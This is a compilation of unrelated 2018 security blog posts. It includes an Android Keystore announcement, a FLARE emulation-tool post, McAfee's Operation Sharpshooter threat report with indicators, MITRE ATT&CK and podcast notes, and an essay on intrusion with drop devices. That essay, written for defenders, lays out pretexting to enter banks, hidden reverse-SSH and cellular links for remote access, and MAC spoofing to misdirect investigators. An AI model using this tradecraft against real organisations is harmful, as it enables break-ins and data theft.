Using this tool, I was able to look at the JSON parsing in more detail. I also set up distributed fuzzing of the JSON binary. Unfortunately, it did not uncover any bugs either.

Overall, WhatsApp signalling seemed like a promising attack surface, but we did not find any vulnerabilities in it. There were two areas where we were able to extend the attack surface beyond what is used in the basic call flow. First, it was possible to send signalling messages that should only be sent after a call is answered before the call is answered, and they were processed by the receiving device. Second, it was possible for a peer to send voip_options JSON to another device. WhatsApp could reduce the attack surface of signalling by removing these capabilities.

I made these suggestions to WhatsApp, and they responded that they were already aware of the first issue as well as variants of the second issue. They said they were in the process of limiting what signalling messages can be processed by the device before a call is answered. They had already fixed other issues where a peer can send voip_options JSON to another peer, and fixed the method I reported as well. They said they are also considering adding cryptographic signing to the voip_options parameter so a device can verify it came from the server to further avoid issues like this. We appreciate their quick resolution of the voip_options issue and strong interest in implementing defense-in-depth measures.

In Part 5, we will discuss the conclusions of our research and make recommendations for better securing video conferencing.

New Keystore features keep your slice of Android Pie a little safer

Posted by Lilian Young and Shawn Willden, Android Security; and Frank Salim, Google Pay

[Cross-posted from the Android Developers Blog]

New Android Pie Keystore Features

The Android Keystore provides application developers with a set of cryptographic tools that are designed to secure their users' data. Keystore moves the cryptographic primitives available in software libraries out of the Android OS and into secure hardware. Keys are protected and used only within the secure hardware to protect application secrets from various forms of attacks. Keystore gives applications the ability to specify restrictions on how and when the keys can be used.
Android Pie introduces new capabilities to Keystore. We will be discussing two of these new capabilities in this post. The first enables restrictions on key use so as to protect sensitive information. The second facilitates secure key use while protecting key material from the application or operating system.

Keyguard-bound keys

There are times when a mobile application receives data but doesn't need to immediately access it if the user is not currently using the device. Sensitive information sent to an application while the device screen is locked must remain secure until the user wants access to it. Android Pie addresses this by introducing keyguard-bound cryptographic keys. When the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern, or password, any attempt to use these keys will result in an invalid operation. Keyguard-bound keys protect the user's data while the device is locked, and only available when the user needs it.
Keyguard binding and authentication binding both function in similar ways, except with one important difference. Keyguard binding ties the availability of keys directly to the screen lock state while authentication binding uses a constant timeout. With keyguard binding, the keys become unavailable as soon as the device is locked and are only made available again when the user unlocks the device.
It is worth noting that keyguard binding is enforced by the operating system, not the secure hardware. This is because the secure hardware has no way to know when the screen is locked. Hardware-enforced Android Keystore protection features like authentication binding, can be combined with keyguard binding for a higher level of security. Furthermore, since keyguard binding is an operating system feature, it's available to any device running Android Pie.
Keys for any algorithm supported by the device can be keyguard-bound. To generate or import a key as keyguard-bound, call setUnlockedDeviceRequired(true) on the KeyGenParameterSpec or KeyProtection builder object at key generation or import.

Secure Key Import

Secure Key Import is a new feature in Android Pie that allows applications to provision existing keys into Keystore in a more secure manner. The origin of the key, a remote server that could be sitting in an on-premise data center or in the cloud, encrypts the secure key using a public wrapping key from the user's device. The encrypted key in the SecureKeyWrapper format, which also contains a description of the ways the imported key is allowed to be used, can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key. Keys are encrypted in transit and remain opaque to the application and operating system, meaning they're only available inside the secure hardware into which they are imported.

Secure Key Import is useful in scenarios where an application intends to share a secret key with an Android device, but wants to prevent the key from being intercepted or from leaving the device. Google Pay uses Secure Key Import to provision some keys on Pixel 3 phones, to prevent the keys from being intercepted or extracted from memory. There are also a variety of enterprise use cases such as S/MIME encryption keys being recovered from a Certificate Authorities escrow so that the same key can be used to decrypt emails on multiple devices.
To take advantage of this feature, please review this training article. Please note that Secure Key Import is a secure hardware feature, and is therefore only available on select Android Pie devices. To find out if the device supports it, applications can generate a KeyPair with PURPOSE_WRAP_KEY.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompress – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left to either opening up a debugger and instrumenting the sample to decode it for you, or transposing the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available to you as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as it’s needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks for both individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over, or call into function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D.  This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.

    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached, regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant.  Like the emulateRange API, options for user-defined hooks for both individual instructions and for when “call” instructions are encountered are provided. An example use of the iterate API is for the function argument tracking technique mentioned earlier in this post.

    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate a blob of extraneous shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. Like with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.

    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.


Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.

Figure 4: Calls to a timestamp conversion function

Figure 5: Simple example of flare-emu usage

Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-references issues. If you have not read that blog post, I recommend reading it before continuing on reading this post as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary and had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.

Figure 7: Objective-C IDB snippet before running objc2_analyzer

Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe the instructions referencing selectors have been patched to instead reference the implementation function itself, for easy transition. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them as shown in Figure 9.

Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 have brought improvements to Objective-C code analysis and handling. However, at the time of writing, the latest version of IDA Pro being 7.2, there are still shortcomings that are mitigated using this tool as well as the immensely helpful comments that are added. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.


flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. And for all, we hope you find value in using these new tools!

Marriott Starwood Breach Spotlights Multiple Cyber Security Issues

Marriott Starwood breach compromises 500 million customers and has far-reaching implications The Marriott Starwood breach, which exposed the personal data of 500 million guests, was not the largest data breach in terms of size; Yahoo still holds that dubious honor. However, because of the nature of the data stolen, it has the potential for a… Read More

The post Marriott Starwood Breach Spotlights Multiple Cyber Security Issues appeared first on .

‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.



Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.


Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection


  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers


Document URLs

  • hxxp:// Planning Manager.doc
  • hxxp:// Intelligence Administrator.doc
  • hxxp:// Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC


The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

Notes about hacking with drop tools

In this report, Kasperky found Eastern European banks hacked with Raspberry Pis and "Bash Bunnies" (DarkVishnya). I thought I'd write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with $200 "netbook" (cheap notebook computers). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.

A "Raspberry Pi" is a $35 single board computer, for which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers, robotics, and hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use.

You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.

Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't not nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over an spread them if they think you are a regulator. Or, you can pretend to be maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.

Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection.

One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command-prompts to a command-and-control server. Another alternative is to create a SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.

Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as sticking a second Raspberry Pi in a nearby bar that is close enough to connection, and then use the bar's Internet connection to hop-scotch on in.

The third alternative, which appears to be the one used in the article above, is to use a 3G/4G modem. You can get such modems for another $15 to $30. You can get "data only" plans, especially through MVNOs, for around $1 to $5 a month, especially prepaid plans that require no identification. These are "low bandwidth" plans designed for IoT command-and-control where only a few megabytes are transferred per month, which is perfect for command-line access to these drop tools.

With all this, you are looking at around $75 for the hardware, software, and 3G/4G plan for a year to remotely connect to a box on the target network.

As an alternative, you might instead use a cheap consumer router reflashed with the OpenWRT Linux distro. A good example would be a Gl.INET device for $19. This a cheap Chinese manufacturer that makes cheap consumer routers designed specifically for us hackers who want to do creative things with them.

The benefit of such devices is that they look like the sorts of consumer devices that one might find on a local network. Raspberry Pi devices stand out as something suspicious, should they ever be discovered, but a reflashed consumer device looks trustworthy.

The problem with these devices is that they are significantly less powerful than a Raspberry Pi. The typical processor is usually single core around 500 MHz, and the typical memory is only around 32 to 128 megabytes. Moreover, while many hacker tools come precompiled for OpenWRT, you'll end up having to build most of the tools yourself, which can be difficult and frustrating.

Hacking techniques

Once you've got your drop tool plugged into the network, then what do you do?

One question is how noisy you want to be, and how good you think the defenders are. The classic thing to do is run a port scanner like nmap or masscan to map out the network. This is extremely noisy and even clueless companies will investigate.

This can be partly mitigated by spoofing your MAC and IP addresses. However, a properly run network will still be able to track back the addresses to the proper port switch. Therefore, you might want to play with a bunch of layer 2 things. For example, passively watch for devices that get turned off a night, then spoof their MAC address during your night time scans, so that when they come back in the morning, they'll trace it back to the wrong device causing the problem.

An easier thing is to passively watch what's going on. In purely passive mode, they really can't detect that you exist at all on the network, other than the fact that the switch port reports something connected. By passively looking at ARP packets, you can get a list of all the devices on your local segment. By passively looking at Windows broadcasts, you can map out large parts of what's going on with Windows. You can also find MacBooks, NAT routers, SIP phones, and so on.

This allows you to then target individual machines rather than causing a lot of noise on the network, and therefore go undetected.

If you've got a target machine, the typical procedure is to port scan it with nmap, find the versions of software running that may have known vulnerabilities, then use metasploit to exploit those vulnerabilities. If it's a web server, then you might use something like burpsuite in order to find things like SQL injection. If it's a Windows desktop/server, then you'll start by looking for unauthenticated file shares, man-in-the-middle connections, or exploit it with something like EternalBlue.

The sorts of things you can do is endless, just read any guide on how to use Kali Linux, and follow those examples.

Note that your command-line connection may be a low-bandwidth 3G/4G connection, but when it's time to exfiltrate data, you'll probably use the corporate Internet connection to transfer gigabytes of data.

USB hacking tools

The above paper described not only drop tools attached to the network, but also tools attached view USB. This is a wholly separate form of hacking.

According to the description, the hackers used BashBunny, a $100 USB device. It's a computer than can emulate things like a keyboard.

However, a cheaper alternative is the Raspberry Pi Zero W for $15, with Kali Linux installed, especially a Kali derivative like this one that has USB attack tools built in and configured.

One set of attacks is through a virtual keyboard and mouse. It can keep causing mouse/keyboard activity invisibly in the background to avoid the automatic lockout, then presumably at night, run commands that will download and run evil scripts. A good example is the "fileless PowerShell" scripts mentioned in the article above.

This may be combined with emulation of a flash drive. In the old days, hostile flash drives could directly infect a Windows computer once plugged in. These days, that won't happen without interaction by the user -- interaction using a keyboard/mouse, which the device can also emulate.

Another set of attacks is pretending to be a USB Ethernet connection. This allows network attacks, such as those mentioned above, to travel across the USB port, without being detectable on the real network. It also allows additional tricks. For example, it can configure itself to be the default route for Internet (rather than local) access, redirecting all web access to a hostile device on the Internet. In other words, the device will usually be limited in that it doesn't itself have access to the Internet, but it can confuse the network configuration of the Windows device to cause other bad effects.

Another creative use is to emulate a serial port. This works for a lot of consumer devices and things running Linux. This will get you a shell directly on the device, or a login that accepts a default or well-known backdoor password. This is a widespread vulnerability because it's so unexpected.

In theory, any USB device could be emulated. Today's Windows, Linux, and macOS machines have a lot of device drivers that are full of vulnerabilities that an be exploited. However, I don't see any easy to use hacking toolkits that'll make this easy for you, so this is still mostly just theoretical.


The purpose of this blogpost isn't "how to hack" by "how to defend". Understanding what attackers do is the first step in understanding how to stop them.

Companies need to understand the hardware on their network. They should be able to list all the hardware devices on all their switches and have a running log of any new device that connects. They need to be able to quickly find the physical location of any device, with well-documented cables and tracking which MAC address belongs to which switch port. Better yet, 802.11x should be used to require authentication on Ethernet just like you require authentication on WiFi.

The same should be done for USB. Whenever a new USB device is plugged into Windows, that should be logged somewhere. I would suggest policies banning USB devices, but they are so useful this can become very costly to do right.

Companies should have enough monitoring that they can be notified whenever somebody runs a scanner like nmap. Better yet, they should have honeypot devices and services spread throughout their network that will notify them if somebody is already inside their network.


Hacking a target like a bank consists of three main phrases: getting in from the outside, moving around inside the network to get to the juice bits, then stealing money/data (or causing harm). That first stage is usually the hardest, and can be bypassed with physical access, dropping some sort of computer on the network. A $50 device like a Raspberry Pi running Kali Linux is perfect for this. 

Every security professional should have experience with this. Whether it's actually a Raspberry Pi or just a VM on a laptop running Kali, security professionals should have experience with this. They should run nmap on their network, they should run burpsuite on their intranet websites, and so on. Of course, this should only be done with knowledge and permission from their bosses, and ideally, boss's bosses.

Risky Business #524 — Huawei CFO arrested, US Government dumps on Equifax

This is the last weekly Risky Business podcast for 2018. We’ll be posting a Soap Box edition early next week then going on break until January 9.

In this week’s show Adam Boileau and Patrick Gray discuss the week’s security news:

  • Huawei’s CFO arrested over sanctions violations
  • BT in the UK removes Huawei equipment from 4G network
  • Australia passes controversial surveillance law
  • US House Oversight Committee blasts Equifax in scathing report
  • Bloomberg plays word-games on Super Micro story
  • MOAR

This week’s show is sponsored by Bugcrowd. In this week’s sponsor interview Bugcrowd’s CTO and founder Casey Ellis tells us why his company is launching “pay for effort” products to run alongside bounty programs.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

US, China executives grow wary about travel after Huawei arrest
Canadian court grants bail to CFO of China's Huawei | Reuters
Michael Kovrig: Canadian ex-diplomat 'held in China' - BBC News
BT removing Huawei equipment from parts of 4G network | Technology | The Guardian
China's cyber-espionage against U.S. is 'more audacious,' NSA official says amid Huawei flap
China spied on African Union headquarters for five years — Quartz Africa
House panel: Equifax breach was ‘entirely preventable’
Committee Releases Report Revealing New Information on Equifax Data Breach - United States House Committee on Oversight and Government Reform
Experian Exposes Apparent Customer Data in Training Manuals - Motherboard
NotPetya leads to unprecedented insurance coverage dispute
Over 40,000 credentials for government portals found online | ZDNet
What's actually in Australia's encryption laws? Everything you need to know | ZDNet
Australia's encryption laws will fall foul of differing definitions | ZDNet
Australia Just Became The Testing Ground For Breaking Into Encryption
Matthew Green on Twitter: "GCHQ has proposal to surveill encrypted messaging and phone calls. The idea is to use weaknesses in the “identity system” to create a surveillance backdoor. This is a bad idea for so many reasons. Thread. 1/"
Melbourne terror attack plot suspects arrested in police raids over mass shooting fears - ABC News (Australian Broadcasting Corporation)
Why Scott Morrison is right on encryption but wrong on Muslims
Super Micro Says Third-Party Test Found No Malicious Hardware - Bloomberg
Someone Defaced Website With ‘Goatse’ And Anti-Diversity Tirade - Motherboard
Nearly 250 Pages of Devastating Internal Facebook Documents Posted Online By UK Parliament - Motherboard
Internal Documents Show Facebook Has Never Deserved Our Trust or Our Data - Motherboard
Google+ Exposed Data of 52.5 Million Users and Will Shut Down in April | WIRED
Iranians indicted in Atlanta city government ransomware attack | Ars Technica
Report: FBI opens criminal investigation into net neutrality comment fraud | Ars Technica
Police arrest hacker behind WeChat ransomware attack - CGTN
A bug in Microsoft’s login system made it easy to hijack anyone’s Office account | TechCrunch
For the fourth month in a row, Microsoft patches Windows zero-day used in the wild | ZDNet
Hackers ramp up attacks on mining rigs before Ethereum price crashes into the gutter | ZDNet
OpSec mistake brings down network of Dark Web money counterfeiter | ZDNet
Google CEO Says No Plan to ‘Launch’ Censored Search Engine in China - Motherboard
Marriott to reimburse some guests for new passports after massive data breach | ZDNet
Eastern European banks lose tens of millions of dollars in Hollywood-style hacks | ZDNet
Industrial espionage fears arise over Chrome extension caught stealing browsing history | ZDNet
Hacker Fantastic on Twitter: ""open-source is more secure than closed-source because you can view the source code" ... GNU inetutils <= 1.9.4 telnet.c multiple overflows"
Your Apps Know Where You Were Last Night, and They’re Not Keeping It Secret - The New York Times
APPSEC CALIFORNIA 2019 - OWASP AppSec California 2019
Next Gen Pen Testing

A Quick Introduction to the MITRE ATT&CK Framework

If you’re an avid reader of threat trends or a fan of red team exercises, you’ve probably come across a reference to the MITRE ATT&CK framework in the last few months. If you have ever wondered what it was all about or if you’ve never heard of it but are interested in how you can improve your security posture, this blog is for you.

To start with, let’s explain what MITRE is. MITRE is a nonprofit organization founded in 1958 (and funded with federal tax dollars) that works on projects for a variety of U.S. government agencies, including the IRS, Department of Defense (DOD), Federal Aviation Administration (FAA), and National Institute of Standards and Technology (NIST). It is not a professional third-party cybersecurity testing agency, which is a common misconception. Its focus is to provide U.S. government agencies with essential deliverables—such as models, technologies and intellectual property—related to U.S. national security, including cybersecurity, healthcare, tax policy, etc. In the cybersecurity landscape, MITRE is mostly known for managing Common Vulnerabilities and Exposures (CVEs) for software vulnerabilities. Note that CVEs are pre-exploitation/defense, whereas the MITRE ATT&CK model is focused on post-exploitation only.

Your next question is probably around what MITRE ATT&CK is and what makes it a model or a framework. The name stands for: Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK). It is a curated knowledgebase and model for cyberadversary behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they are known to target. The tactics and techniques looked at in the model are used to classify adversary actions by offense and defense, relating them to specific ways of defending against them. What began as an idea in 2010 during an experiment has since grown into a set of evolving resources for cybersecurity experts to contribute to and apply for red teaming, threat hunting, and other tasks. Security practitioners can harden their endpoint defenses and accurately assess themselves by using the model and the tools to help determine how well they are doing at detecting documented adversary behavior.

If you’ve been in the security realm for a while, this may remind you somewhat of Lockheed Martin’s Cyber Kill Chain. It stated that attacks occur in stages and can be disrupted through controls established at each stage. It was also used to reveal the stages of a cyberattack. To understand the overlap of the two models, take a look at this figure:

In the figure above we see that the MITRE ATT&CK matrix model is essentially a subset of the Cyber Kill Chain, but it goes in depth when describing the techniques used between the Deliver and Maintain stages. The Cyber Kill Chain, including the MITRE ATT&CK model, might look like a linear process, but it actually isn’t. It’s rather a branching and looping chain, but we have shown it in a linear fashion to make it easier to understand.

At McAfee, we embrace the MITRE model as a fabulous and detailed way to think about adversarial activity, especially APTs post-compromise, and are applying it to different levels and purposes in our organization. Specifically, we are engineering our endpoint products using the insights gained from MITRE ATT&CK to significantly enhance our fileless threat defense capabilities. Additionally, we are using it to inform our roadmaps and are actively contributing to the model by sharing newly discovered techniques used by adversaries. We are partnering with MITRE and were recently a core sponsor of the inaugural MITRE ATT&CKcon in the Washington, D.C. area.

Over the next few weeks, I’ll continue to go deeper into how MITRE ATT&CK matrix testing works, how you can use it, how it’s different from other testing methods, and how McAfee is investing in it.

The post A Quick Introduction to the MITRE ATT&CK Framework appeared first on McAfee Blogs.

12 Days of Hack-mas

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. The ways in which they exact their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to the sophistication and multitude of cyberattacks targeted toward consumers.

Between the apps and websites we use every day, in addition to the numerous connected devices we continue to add our homes, there are a more ways than ever in which our cybersecurity can be compromised. Let’s take a look at 12 common, connected devices that are vulnerable to attacks –most of which our friends at the “Hackable?” podcast have demonstrated– and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuels the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

